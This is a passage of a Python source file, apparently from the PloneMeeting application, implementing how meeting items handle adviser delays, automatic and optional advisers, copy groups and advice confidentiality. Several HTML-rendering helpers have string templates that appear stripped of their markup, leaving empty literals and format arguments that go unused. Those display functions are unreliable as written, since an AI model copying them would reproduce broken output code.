old_adviceIndex.get(group_id, {})\n if adviceInfo.get('delay_infos', {}) and \\\n old_adviceInfo.get('delay_infos', {}) and \\\n not self._advice_is_given(group_id):\n # take also into account freshly expired delays\n just_timed_out = _just_timed_out(adviceInfo, old_adviceInfo)\n if _delay_in_alert(adviceInfo, old_adviceInfo) or just_timed_out:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n left_delay = adviceInfo['delay_infos']['left_delay']\n limit_date = adviceInfo['delay_infos']['limit_date_localized']\n event_id = 'adviceDelayWarning'\n if left_delay == -1 or just_timed_out:\n event_id = 'adviceDelayExpired'\n\n if event_id in cfg.getMailItemEvents():\n plone_group_id = '{0}_advisers'.format(group_id)\n sendMailIfRelevant(\n self,\n event_id,\n [plone_group_id],\n mapping={\n 'left_delay': left_delay,\n 'limit_date': limit_date,\n 'group_name': self.adviceIndex[group_id]['name'],\n 'delay_label': self.adviceIndex[group_id]['delay_label']},\n isGroupIds=True)\n\n def getUnhandledInheritedAdvisersData(self, adviserUids, optional):\n \"\"\" \"\"\"\n predecessor = self.get_predecessor()\n res = []\n for adviserUid in adviserUids:\n # adviserId could not exist if we removed an inherited initiative advice for example\n if not predecessor.adviceIndex.get(adviserUid, None):\n continue\n if (optional and not predecessor.adviceIndex[adviserUid]['optional']):\n continue\n res.append(\n {'org_uid': predecessor.adviceIndex[adviserUid]['id'],\n 'org_title': predecessor.adviceIndex[adviserUid]['name'],\n 'gives_auto_advice_on_help_message':\n predecessor.adviceIndex[adviserUid]['gives_auto_advice_on_help_message'],\n 'row_id': predecessor.adviceIndex[adviserUid]['row_id'],\n 'delay': predecessor.adviceIndex[adviserUid]['delay'],\n 'delay_left_alert': predecessor.adviceIndex[adviserUid]['delay_left_alert'],\n 'delay_label': predecessor.adviceIndex[adviserUid]['delay_label'],\n 'userids': predecessor.adviceIndex[adviserUid].get('userids', [])})\n return res\n\n security.declarePublic('getOptionalAdvisers')\n\n def getOptionalAdvisers(self, computed=False, **kwargs):\n '''Override MeetingItem.optionalAdvisers accessor\n to handle p_computed parameters that will turn a \"__userid__\" value\n to it's corresponding adviser value.'''\n optionalAdvisers = self.getField('optionalAdvisers').get(self)\n if computed:\n res = []\n for adviser in optionalAdvisers:\n if \"__userid__\" in adviser:\n value, user_id = adviser.split(\"__userid__\")\n res.append(value)\n else:\n res.append(adviser)\n optionalAdvisers = res\n return optionalAdvisers\n\n security.declarePublic('getOptionalAdvisersData')\n\n def getOptionalAdvisersData(self):\n '''Get optional advisers but with same format as getAutomaticAdvisersData\n so it can be handled easily by the updateAdvices method.\n We need to return a list of dict with relevant informations.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = []\n optionalAdvisers = self.getOptionalAdvisers()\n for adviser in self.getOptionalAdvisers(computed=True):\n # if this is a delay-aware adviser, we have the data in the adviser id\n if '__rowid__' in adviser:\n org_uid, row_id = decodeDelayAwareId(adviser)\n customAdviserInfos = cfg._dataForCustomAdviserRowId(row_id)\n delay = customAdviserInfos['delay']\n delay_left_alert = customAdviserInfos['delay_left_alert']\n delay_label = customAdviserInfos['delay_label']\n else:\n org_uid = adviser\n row_id = delay = delay_left_alert = delay_label = ''\n # manage userids\n userids = [optionalAdviser.split('__userid__')[1]\n for optionalAdviser in optionalAdvisers\n if '__userid__' in optionalAdviser and\n optionalAdviser.startswith(adviser)]\n res.append({'org_uid': org_uid,\n 'org_title': get_organization(org_uid).get_full_title(),\n 'gives_auto_advice_on_help_message': '',\n 'row_id': row_id,\n 'delay': delay,\n 'delay_left_alert': delay_left_alert,\n 'delay_label': delay_label,\n 'userids': userids})\n return res\n\n security.declarePublic('getAutomaticAdvisersData')\n\n def getAutomaticAdvisersData(self):\n '''Who are the automatic advisers for this item? We get it by\n evaluating the TAL expression on current MeetingConfig.customAdvisers and checking if\n corresponding group contains at least one adviser.\n The method returns a list of dict containing adviser infos.'''\n extra_expr_ctx = _base_extra_expr_ctx(self)\n cfg = extra_expr_ctx['cfg']\n res = []\n for customAdviser in cfg.getCustomAdvisers():\n # check if there is something to evaluate...\n strippedExprToEvaluate = customAdviser['gives_auto_advice_on'].replace(' ', '')\n if not strippedExprToEvaluate or strippedExprToEvaluate == 'python:False':\n continue\n # respect 'for_item_created_from' and 'for_item_created_until' defined dates\n createdFrom = customAdviser['for_item_created_from']\n createdUntil = customAdviser['for_item_created_until']\n # createdFrom is required but not createdUntil\n if DateTime(createdFrom) > self.created() or \\\n (createdUntil and DateTime(createdUntil) < self.created()):\n continue\n\n # Check that the TAL expression on the group returns True\n eRes = False\n org = get_organization(customAdviser['org'])\n extra_expr_ctx.update({'item': self, 'org': org, 'org_uid': customAdviser['org']})\n eRes = _evaluateExpression(\n self,\n expression=customAdviser['gives_auto_advice_on'],\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False,\n error_pattern=AUTOMATIC_ADVICE_CONDITION_ERROR)\n\n if eRes:\n res.append({'org_uid': customAdviser['org'],\n 'org_title': org.get_full_title(),\n 'row_id': customAdviser['row_id'],\n 'gives_auto_advice_on_help_message':\n customAdviser['gives_auto_advice_on_help_message'],\n 'delay': customAdviser['delay'],\n 'delay_left_alert': customAdviser['delay_left_alert'],\n 'delay_label': customAdviser['delay_label'],\n # userids is unhandled for automatic advisers\n 'userids': []})\n # check if the found automatic adviser is not already in the self.adviceIndex\n # but with a manually changed delay, aka\n # 'delay_for_automatic_adviser_changed_manually' is True\n storedCustomAdviser = self.adviceIndex.get(customAdviser['org'], {})\n delay_for_automatic_adviser_changed_manually = \\\n 'delay_for_automatic_adviser_changed_manually' in storedCustomAdviser and \\\n storedCustomAdviser['delay_for_automatic_adviser_changed_manually'] or False\n if storedCustomAdviser and \\\n not storedCustomAdviser['row_id'] == customAdviser['row_id'] and \\\n delay_for_automatic_adviser_changed_manually and \\\n not storedCustomAdviser['optional']:\n # we have an automatic advice for relevant group but not for current row_id\n # check if it is from a linked row in the MeetingConfig.customAdvisers\n isAutomatic, linkedRows = cfg._findLinkedRowsFor(customAdviser['row_id'])\n for linkedRow in linkedRows:\n if linkedRow['row_id'] == customAdviser['row_id']:\n # the found advice was actually linked, we keep it\n # adapt last added dict to res to keep storedCustomAdviser value\n res[-1]['row_id'] = storedCustomAdviser['row_id']\n res[-1]['gives_auto_advice_on_help_message'] = \\\n storedCustomAdviser['gives_auto_advice_on_help_message']\n res[-1]['delay'] = storedCustomAdviser['delay']\n res[-1]['delay_left_alert'] = storedCustomAdviser['delay_left_alert']\n res[-1]['delay_label'] = storedCustomAdviser['delay_label']\n return res\n\n security.declarePrivate('addAutoCopyGroups')\n\n def addAutoCopyGroups(self, isCreated):\n '''What group should be automatically set as copyGroups for this item?\n We get it by evaluating the TAL expression on every active\n organization.as_copy_group_on. The expression returns a list of suffixes\n or an empty list. The method update existing copyGroups and add groups\n prefixed with AUTO_COPY_GROUP_PREFIX.'''\n # empty stored autoCopyGroups\n self.autoCopyGroups = PersistentList()\n extra_expr_ctx = _base_extra_expr_ctx(self)\n cfg = extra_expr_ctx['cfg']\n for org_uid, expr in cfg.get_orgs_with_as_copy_group_on_expression().items():\n extra_expr_ctx.update({'item': self, 'isCreated': isCreated})\n suffixes = _evaluateExpression(\n self,\n expression=expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False,\n error_pattern=AS_COPYGROUP_CONDITION_ERROR)\n if not suffixes or not isinstance(suffixes, (tuple, list)):\n continue\n # The expression is supposed to return a list a Plone group suffixes\n # check that the real linked Plone groups are selectable\n for suffix in suffixes:\n if suffix not in get_all_suffixes(org_uid):\n # If the suffix returned by the expression does not exist\n # log it, it is a configuration problem\n logger.warning(AS_COPYGROUP_RES_ERROR.format(suffix, org_uid))\n continue\n plone_group_id = get_plone_group_id(org_uid, suffix)\n auto_plone_group_id = '{0}{1}'.format(AUTO_COPY_GROUP_PREFIX, plone_group_id)\n self.autoCopyGroups.append(auto_plone_group_id)\n\n def _evalAdviceAvailableOn(self, available_on_expr, mayEdit=True):\n \"\"\" \"\"\"\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, 'mayEdit': mayEdit})\n res = _evaluateExpression(\n self,\n expression=available_on_expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=True,\n error_pattern=ADVICE_AVAILABLE_ON_CONDITION_ERROR)\n return res\n\n security.declarePrivate('listItemInitiators')\n\n def listItemInitiators(self):\n '''Initiator may be an organization or a held_position.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = []\n # missing terms\n stored_terms = self.getItemInitiator()\n missing_term_uids = [uid for uid in stored_terms if uid not in cfg.getOrderedItemInitiators()]\n missing_terms = []\n if missing_term_uids:\n missing_terms = uuidsToObjects(missing_term_uids, unrestricted=True)\n for org_or_hp in cfg.getOrderedItemInitiators(theObjects=True) + missing_terms:\n if org_or_hp.portal_type == 'organization':\n res.append((org_or_hp.UID(), org_or_hp.Title()))\n else:\n res.append((org_or_hp.UID(), org_or_hp.get_short_title()))\n return DisplayList(res)\n\n security.declarePrivate('getAdvices')\n\n def getAdvices(self):\n '''Returns a list of contained meetingadvice objects.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n advicePortalTypeIds = tool.getAdvicePortalTypeIds()\n for obj in self.objectValues('Dexterity Container'):\n if obj.portal_type in advicePortalTypeIds:\n res.append(obj)\n return res\n\n def _doClearDayFrom(self, date):\n '''Change the given p_date (that is a datetime instance)\n into a clear date, aka change the hours/minutes/seconds to 23:59:59.'''\n return datetime(date.year, date.month, date.day, 23, 59, 59)\n\n security.declarePublic('getAdvicesGroupsInfosForUser')\n\n def getAdvicesGroupsInfosForUser(self,\n compute_to_add=True,\n compute_to_edit=True,\n compute_power_advisers=True):\n '''This method returns 2 lists of groups in the name of which the\n currently logged user may, on this item:\n - add an advice;\n - edit or delete an advice.\n Depending on p_compute_to_add and p_compute_to_edit,\n returned list are computed or left empty.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # Advices must be enabled\n if not cfg.getUseAdvices():\n return ([], [])\n # Logged user must be an adviser\n user_org_uids = tool.get_orgs_for_user(suffixes=['advisers'])\n if not user_org_uids:\n return ([], [])\n # Produce the lists of groups to which the user belongs and for which,\n # - no advice has been given yet (list of advices to add)\n # - an advice has already been given (list of advices to edit/delete).\n toAdd = []\n toEdit = []\n powerAdvisers = cfg.getPowerAdvisersGroups()\n itemState = self.query_state()\n for user_org_uid in user_org_uids:\n if user_org_uid in self.adviceIndex:\n advice = self.adviceIndex[user_org_uid]\n adapted = self.adapted()\n if compute_to_add and advice['type'] == NOT_GIVEN_ADVICE_VALUE and \\\n advice['advice_addable'] and \\\n adapted._adviceIsAddableByCurrentUser(user_org_uid):\n toAdd.append(user_org_uid)\n if compute_to_edit and advice['type'] != NOT_GIVEN_ADVICE_VALUE and \\\n advice['advice_editable'] and \\\n adapted._adviceIsEditableByCurrentUser(user_org_uid):\n toEdit.append(user_org_uid)\n # if not in self.adviceIndex, aka not already given\n # check if group is a power adviser and if he is allowed\n # to add an advice in current item state\n elif compute_to_add and compute_power_advisers and user_org_uid in powerAdvisers:\n # we avoid waking up the organization, we get states using\n # MeetingConfig.getItemAdviceStatesForOrg that is ram.cached\n if itemState in cfg.getItemAdviceStatesForOrg(org_uid=user_org_uid):\n toAdd.append(user_org_uid)\n return (toAdd, toEdit)\n\n def _advicePortalTypeForAdviser(self, org_uid):\n '''See doc in interfaces.py.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n extra_infos = tool.adapted().get_extra_adviser_infos()\n adviser_infos = extra_infos.get(org_uid, {})\n advice_portal_type = adviser_infos.get('portal_type', None)\n return advice_portal_type or 'meetingadvice'\n\n def _adviceTypesForAdviser(self, meeting_advice_portal_type):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n return cfg.getUsedAdviceTypes()\n\n def _adviceIsViewableForCurrentUser(self,\n cfg,\n is_confidential_power_observer,\n adviceInfo):\n '''\n Returns True if current user may view the advice.\n '''\n # if confidentiality is used and advice is marked as confidential,\n # and current user is not members of the _advisers that gave advice\n # advices could be hidden to power observers and/or restricted power observers\n if cfg.getEnableAdviceConfidentiality() and adviceInfo['isConfidential']:\n advisers_group_id = get_plone_group_id(adviceInfo['id'], 'advisers')\n if advisers_group_id not in get_plone_groups_for_user() and \\\n is_confidential_power_observer:\n return False\n return True\n\n def _shownAdviceTypeFor(self, adviceInfo):\n \"\"\"Return the advice_type to take into account, essentially regarding\n the fact that the advice is 'hidden_during_redaction' or not.\"\"\"\n adviceType = None\n # if the advice is 'hidden_during_redaction', we create a specific advice type\n if not adviceInfo['hidden_during_redaction']:\n adviceType = adviceInfo['type']\n else:\n # check if advice still giveable/editable\n if adviceInfo['advice_editable']:\n adviceType = HIDDEN_DURING_REDACTION_ADVICE_VALUE\n else:\n adviceType = CONSIDERED_NOT_GIVEN_ADVICE_VALUE\n return adviceType\n\n security.declarePublic('getAdvicesByType')\n\n def getAdvicesByType(self, include_not_asked=True, ordered=True):\n '''Returns the list of advices, grouped by type.'''\n res = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n is_confidential_power_observer = tool.isPowerObserverForCfg(\n cfg, cfg.getAdviceConfidentialFor())\n for groupId, adviceInfo in self.adviceIndex.iteritems():\n if not include_not_asked and adviceInfo['not_asked']:\n continue\n # make sure we do not modify original data\n adviceInfo = deepcopy(adviceInfo)\n\n # manage inherited advice\n if adviceInfo['inherited']:\n # make sure we do not modify original data, use .copy()\n adviceInfo = self.getInheritedAdviceInfo(groupId)\n adviceInfo['inherited'] = True\n # Create the entry for this type of advice if not yet created.\n # first check if current user may access advice, aka advice is not confidential to him\n if not self._adviceIsViewableForCurrentUser(\n cfg, is_confidential_power_observer, adviceInfo):\n continue\n\n adviceType = self._shownAdviceTypeFor(adviceInfo)\n if adviceType not in res:\n res[adviceType] = advices = []\n else:\n advices = res[adviceType]\n advices.append(adviceInfo.__dict__['data'])\n if ordered:\n ordered_res = {}\n\n def getKey(advice_info):\n return advice_info['name']\n for advice_type, advice_infos in res.items():\n ordered_res[advice_type] = sorted(advice_infos, key=getKey)\n res = ordered_res\n return res\n\n def couldInheritAdvice(self, adviserId, dry_run=False):\n \"\"\"For given p_adivserId, could it be set to 'inherited'?\n Not possible if advice already given.\"\"\"\n if not self.getInheritedAdviceInfo(adviserId, checkIsInherited=False):\n return False\n return True\n\n security.declarePublic('getInheritedAdviceInfo')\n\n def getInheritedAdviceInfo(self, adviserId, checkIsInherited=True):\n \"\"\"Return the eventual inherited advice (original advice) for p_adviserId.\n If p_checkIsInherited is True, it will check that current advice is actually inherited,\n otherwise, it will not check and return the potential inherited advice.\"\"\"\n res = None\n predecessor = self.get_predecessor()\n if not predecessor:\n return res\n\n inheritedAdviceInfo = deepcopy(predecessor.adviceIndex.get(adviserId))\n while (predecessor and\n predecessor.adviceIndex.get(adviserId) and\n predecessor.adviceIndex[adviserId]['inherited']):\n predecessor = predecessor.get_predecessor()\n inheritedAdviceInfo = deepcopy(predecessor.adviceIndex.get(adviserId))\n\n res = inheritedAdviceInfo\n res['adviceHolder'] = predecessor\n return res\n\n security.declarePublic('getGivenAdvices')\n\n def getGivenAdvices(self):\n '''Returns the list of advices that has already been given by\n computing a data dict from contained meetingadvices.'''\n # for now, only contained elements in a MeetingItem of\n # meta_type 'Dexterity Container' are meetingadvices...\n res = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for advice in self.getAdvices():\n optional = True\n gives_auto_advice_on_help_message = delay = delay_left_alert = delay_label = ''\n # find the relevant row in customAdvisers if advice has a row_id\n if advice.advice_row_id:\n customAdviserConfig = cfg._dataForCustomAdviserRowId(advice.advice_row_id)\n # cfg._findLinkedRowsFor returns as first element the fact that it is an automatic advice or not\n optional = not cfg._findLinkedRowsFor(advice.advice_row_id)[0]\n gives_auto_advice_on_help_message = customAdviserConfig['gives_auto_advice_on_help_message'] or ''\n delay = customAdviserConfig['delay'] or ''\n delay_left_alert = customAdviserConfig['delay_left_alert'] or ''\n delay_label = customAdviserConfig['delay_label'] or ''\n advice_given_on = advice.get_advice_given_on()\n res[advice.advice_group] = {'type': advice.advice_type,\n 'optional': optional,\n 'not_asked': False,\n 'id': advice.advice_group,\n 'name': get_organization(advice.advice_group).get_full_title(),\n 'advice_id': advice.getId(),\n 'advice_uid': advice.UID(),\n 'comment': advice.advice_comment and advice.advice_comment.output,\n 'observations':\n advice.advice_observations and advice.advice_observations.output,\n 'reference': advice.advice_reference,\n 'row_id': advice.advice_row_id,\n 'gives_auto_advice_on_help_message': gives_auto_advice_on_help_message,\n 'delay': delay,\n 'delay_left_alert': delay_left_alert,\n 'delay_label': delay_label,\n 'advice_given_on': advice_given_on,\n 'advice_given_on_localized':\n self.toLocalizedTime(advice_given_on),\n 'hidden_during_redaction': advice.advice_hide_during_redaction,\n }\n return res\n\n security.declarePublic('displayOtherMeetingConfigsClonableTo')\n\n def displayOtherMeetingConfigsClonableTo(self):\n '''Display otherMeetingConfigsClonableTo with eventual\n emergency and privacy informations.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n vocab = get_vocab(self, 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n\n # emergency\n emergency_msg = translate('Emergency while presenting in other MC',\n domain='PloneMeeting',\n context=self.REQUEST)\n # privacy\n secret_msg = translate('secret',\n domain='PloneMeeting',\n context=self.REQUEST)\n public_msg = translate('public',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # effective/theorical meeting informations\n effective_meeting_msg = translate('effective_meeting_help',\n domain='PloneMeeting',\n context=self.REQUEST)\n theorical_meeting_msg = translate('theorical_meeting_help',\n domain='PloneMeeting',\n context=self.REQUEST)\n no_meeting_available_msg = translate('no_meeting_available',\n domain='PloneMeeting',\n context=self.REQUEST)\n portal_url = api.portal.get().absolute_url()\n\n res = []\n for otherMC in self.getOtherMeetingConfigsClonableTo():\n isSecret = otherMC in self.getOtherMeetingConfigsClonableToPrivacy()\n cfgTitle = safe_unicode(vocab.getTermByToken(otherMC).title)\n displayEmergency = False\n displayPrivacy = False\n if otherMC in self.getOtherMeetingConfigsClonableToEmergency():\n displayEmergency = True\n if self.attribute_is_used('otherMeetingConfigsClonableToPrivacy'):\n displayPrivacy = True\n\n emergencyAndPrivacyInfos = []\n if displayEmergency:\n emergencyAndPrivacyInfos.append(\n u\"{0}\".format(emergency_msg))\n if displayPrivacy:\n privacyInfo = u\"{1}\".format(\n isSecret and 'secret' or 'public',\n isSecret and secret_msg or public_msg)\n emergencyAndPrivacyInfos.append(privacyInfo)\n\n # if sendable, display logical meeting into which it could be presented\n # if already sent, just display the \"sent\" information\n LOGICAL_DATE_PATTERN = u\" {2}\"\n clonedItem = self.getItemClonedToOtherMC(otherMC)\n if not clonedItem or not clonedItem.hasMeeting():\n logicalMeeting = self._otherMCMeetingToBePresentedIn(getattr(tool, otherMC))\n if logicalMeeting:\n logicalMeetingLink = logicalMeeting.get_pretty_link()\n else:\n logicalMeetingLink = no_meeting_available_msg\n iconName = 'greyedMeeting.png'\n title_help_msg = theorical_meeting_msg\n else:\n clonedItemMeeting = clonedItem.getMeeting()\n logicalMeetingLink = clonedItemMeeting.get_pretty_link()\n iconName = 'Meeting.png'\n title_help_msg = effective_meeting_msg\n\n logicalDateInfo = LOGICAL_DATE_PATTERN.format('/'.join((portal_url, iconName)),\n title_help_msg,\n logicalMeetingLink)\n\n tmp = u\"{0} ({1})\".format(cfgTitle, \" - \".join(emergencyAndPrivacyInfos + [logicalDateInfo]))\n res.append(tmp)\n return u\", \".join(res) or \"-\"\n\n def displayOtherMeetingConfigsClonableToPossibleValues(self):\n '''Display otherMeetingConfigsClonableTo possible values.'''\n vocab = get_vocab(self, 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n return u\", \".join([safe_unicode(term.title) for term in vocab._terms]) or \"-\"\n\n security.declarePublic('showAdvices')\n\n def showAdvices(self):\n \"\"\"This controls if advices need to be shown on the item view.\"\"\"\n item = self.getSelf()\n\n # something in adviceIndex?\n if bool(item.adviceIndex):\n return True\n\n # MeetingConfig using advices?\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if cfg.getUseAdvices():\n return True\n\n return False\n\n def _realCopyGroupId(self, groupId):\n \"\"\"Return the real group id, especially if given p_groupId\n is an auto copy group.\"\"\"\n return groupId.split(AUTO_COPY_GROUP_PREFIX)[-1]\n\n security.declarePublic('displayCopyGroups')\n\n def displayCopyGroups(self):\n '''Display copy groups on the item view, especially the link showing users of a group.'''\n portal_url = api.portal.get().absolute_url()\n copyGroupsVocab = get_vocab(\n self,\n self.getField('copyGroups').vocabulary_factory,\n **{'include_auto': True, })\n res = []\n allCopyGroups = self.getAllCopyGroups()\n for term in copyGroupsVocab._terms:\n if term.value not in allCopyGroups:\n continue\n # auto copyGroups are prefixed with AUTO_COPY_GROUP_PREFIX\n real_group_id = self._realCopyGroupId(term.value)\n res.append(u'{0} {1}'.format(\n # highlight [auto]\n term.title.replace(\n u'[auto]',\n u'[auto]'.format(\n translate('This copy group was set automatically by the application',\n domain='PloneMeeting',\n context=self.REQUEST))),\n u\"\"\n u\"\"\n .format(real_group_id, portal_url)))\n return u', '.join(res)\n\n def _displayAdviserUsers(self, userids, portal_url, tool):\n \"\"\" \"\"\"\n userid_pattern = u'{2}'\n rendered_users = []\n help_msg = translate(\"adviser_userid_notified\",\n domain=\"PloneMeeting\",\n context=self.REQUEST)\n for userid in userids:\n rendered_users.append(\n userid_pattern.format(\n escape(help_msg),\n portal_url,\n safe_unicode(tool.getUserName(userid))))\n res = u\", \".join(rendered_users)\n return res\n\n security.declarePublic('displayAdvisers')\n\n def displayAdvisers(self):\n '''Display advisers on the item view, especially the link showing users of a group.'''\n\n portal_url = api.portal.get().absolute_url()\n tool = api.portal.get_tool('portal_plonemeeting')\n\n def _get_adviser_name(adviser):\n \"\"\"Manage adviser name, will append selected __userid__ if any.\"\"\"\n name = html.escape(adviser['name'])\n if adviser['delay_label']:\n name += u\" - {0} ({1})\".format(\n safe_unicode(html.escape(adviser['delay_label'])),\n safe_unicode(adviser['delay']))\n if adviser['userids']:\n name += u\" ({0})\".format(\n self._displayAdviserUsers(adviser['userids'], portal_url, tool))\n return name\n\n advisers_by_type = self.getAdvicesByType(include_not_asked=False)\n res = []\n auto_advice = u' [auto]'.format(\n translate('This advice was asked automatically by the application',\n domain='PloneMeeting',\n context=self.REQUEST))\n for advice_type, advisers in advisers_by_type.items():\n for adviser in advisers:\n adviser_name = _get_adviser_name(adviser)\n value = u\"{0} \" \\\n u\"\".format(\n adviser_name + (not adviser['optional'] and auto_advice or u''),\n get_plone_group_id(adviser['id'], 'advisers'),\n portal_url)\n res.append(value)\n return u', '.join(res)\n\n security.declarePublic('hasAdvices')\n\n def hasAdvices(self, toGive=False, adviceIdsToBypass={}):\n '''Is there at least one given advice on this item?\n If p_toGive is True, it contrary returns if there\n is still an advice to be given.\n If some p_adviceIdsToBypass are given, these will not be taken\n into account as giveable.\n p_adviceIdsToBypass is a dict containing the advice to give as\n key and the fact that advice is optional as value, so :\n {'adviser_group_id': True}.'''\n for advice in self.adviceIndex.itervalues():\n if advice['id'] in adviceIdsToBypass and \\\n adviceIdsToBypass[advice['id']] == advice['optional']:\n continue\n if (toGive and advice['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again')) or \\\n (not toGive and not advice['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again')):\n return True\n\n return False\n\n security.declarePublic('hasAdvices')\n\n def hasAdvice(self, org_uid):\n '''Returns True if someone from p_groupId has given an advice on this item.'''\n if (org_uid in self.adviceIndex) and \\\n (self.adviceIndex[org_uid]['type'] != NOT_GIVEN_ADVICE_VALUE):\n return True\n\n security.declarePublic('willInvalidateAdvices')\n\n def willInvalidateAdvices(self):\n '''Returns True if at least one advice has been defined on this item\n and advice invalidation has been enabled in the meeting\n configuration.'''\n if self.isTemporary():\n return False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if cfg.getEnableAdviceInvalidation() and self.hasAdvices() \\\n and (self.query_state() in cfg.getItemAdviceInvalidateStates()):\n return True\n return False\n\n security.declarePrivate('enforceAdviceMandatoriness')\n\n def enforceAdviceMandatoriness(self):\n '''Checks in the configuration if we must enforce advice mandatoriness.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n if meetingConfig.getUseAdvices() and \\\n meetingConfig.getEnforceAdviceMandatoriness():\n return True\n return False\n\n security.declarePrivate('mandatoryAdvicesAreOk')\n\n def mandatoryAdvicesAreOk(self):\n '''Returns True if all mandatory advices for this item have been given and are all positive.'''\n if not hasattr(self, 'isRecurringItem'):\n for advice in self.adviceIndex.itervalues():\n if not advice['optional'] and \\\n not advice['type'].startswith('positive'):\n return False\n return True\n\n security.declarePublic('getAdviceDataFor')\n\n def getAdviceDataFor(self,\n item,\n adviser_uid=None,\n hide_advices_under_redaction=True,\n show_hidden_advice_data_to_group_advisers=True,\n ordered=False):\n '''Returns data info for given p_adviser_uid adviser uid.\n If no p_adviser_uid is given, every advice infos are returned.\n If p_hide_advices_under_redaction is True, we hide relevant informations of\n advices hidden during redaction but if p_show_hidden_advice_data_to_group_advisers\n is True, the advisers of the hidden advices will see the data.\n We receive p_item as the current item to be sure that this public\n method can not be called thru the web (impossible to pass an object as parameter),\n but it is still callable using a Script (Python) or useable in a TAL expression...\n If ordered=True, return an OrderedDict sorted by adviser name.'''\n if not isinstance(item, MeetingItem) or not item.UID() == self.UID():\n raise Unauthorized\n\n data = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n adviser_org_uids = tool.get_orgs_for_user(suffixes=['advisers'])\n for adviceInfo in self.adviceIndex.values():\n advId = adviceInfo['id']\n # if advice is inherited get real adviceInfo\n if adviceInfo['inherited']:\n adviceInfo = self.getInheritedAdviceInfo(advId)\n adviceInfo['inherited'] = True\n # turn adviceInfo PersistentMapping into a dict\n data[advId] = dict(adviceInfo)\n # hide advice data if relevant\n if hide_advices_under_redaction and \\\n data[advId][HIDDEN_DURING_REDACTION_ADVICE_VALUE] and \\\n (not show_hidden_advice_data_to_group_advisers or\n (show_hidden_advice_data_to_group_advisers and\n advId not in adviser_org_uids)):\n advice_type = self._shownAdviceTypeFor(adviceInfo)\n if advice_type == HIDDEN_DURING_REDACTION_ADVICE_VALUE:\n msgid = 'advice_hidden_during_redaction_help'\n else:\n msgid = 'advice_hidden_during_redaction_considered_not_given_help'\n data[advId]['type'] = advice_type\n msg = translate(\n msgid=msgid,\n domain='PloneMeeting',\n context=self.REQUEST)\n data[advId]['comment'] = msg\n data[advId]['observations'] = msg\n\n # optimize some saved data\n data[advId]['type_translated'] = translate(data[advId]['type'],\n domain='PloneMeeting',\n context=self.REQUEST)\n # add meetingadvice object if given\n adviceHolder = adviceInfo.get('adviceHolder', self)\n given_advice = adviceHolder.getAdviceObj(advId)\n data[advId]['given_advice'] = given_advice\n data[advId]['creator_id'] = None\n data[advId]['creator_fullname'] = None\n if given_advice:\n creator_id = given_advice.Creator()\n creator_fullname = tool.getUserName(creator_id)\n data[advId]['creator_id'] = creator_id\n data[advId]['creator_fullname'] = creator_fullname\n\n if adviser_uid:\n data = data.get(adviser_uid, {})\n\n if ordered and data:\n # sort by adviser name\n data_as_list = data.items()\n data_as_list.sort(key=lambda x: x[1]['name'])\n data = OrderedDict(data_as_list)\n return data\n\n def getAdviceObj(self, adv_uid):\n \"\"\"Return the advice object for given p_adv_uid.\n If advice object does not exist, None is returned.\"\"\"\n adviceObj = None\n advices = self.getAdvices()\n # get the advice without using self.adviceIndex because\n # getAdviceObj may be called during self.adviceIndex computation\n for advice in advices:\n if advice.advice_group == adv_uid:\n adviceObj = advice\n break\n return adviceObj\n\n def _grantPermissionToRole(self, permission, role_to_give, obj):\n \"\"\"\n Grant given p_permission to given p_role_to_give on given p_obj.\n If p_obj is None, w\n \"\"\"\n roles = rolesForPermissionOn(permission, obj)\n if role_to_give not in roles:\n # cleanup roles as the permission is also returned with a leading '_'\n roles = [role for role in roles if not role.startswith('_')]\n roles = roles + [role_to_give, ]\n obj.manage_permission(permission, roles)\n\n def _removePermissionToRole(self, permission, role_to_remove, obj):\n \"\"\"Remove given p_permission to given p_role_to_remove on given p_obj.\"\"\"\n roles = rolesForPermissionOn(permission, obj)\n if role_to_remove in roles:\n # cleanup roles as the permission is also returned with a leading '_'\n roles = [role for role in roles if not role.startswith('_')]\n if role_to_remove in roles:\n roles.remove(role_to_remove)\n obj.manage_permission(permission, roles)\n\n def _removeEveryContainedAdvices(self, suppress_events=True):\n \"\"\"Remove every contained advices.\"\"\"\n for advice in self.getAdvices():\n self._delObject(advice.getId(), suppress_events=suppress_events)\n\n def _adviceDelayIsTimedOut(self, groupId, computeNewDelayInfos=False):\n \"\"\"Returns True if given p_advice is delay-aware and delay is timed out.\n If p_computeNewDelayInfos is True, we will not take delay_infos from the\n adviceIndex but call getDelayInfosForAdvice to get fresh data.\"\"\"\n if not self.adviceIndex[groupId]['delay']:\n return False\n # in some case, when creating advice, if adviserIndex is reindexed before\n # _updateAdvices is finished, we do not have the 'delay_infos' in the adviceIndex\n # in this case, no matter p_computeNewDelayInfos we use getDelayInfosForAdvice\n if 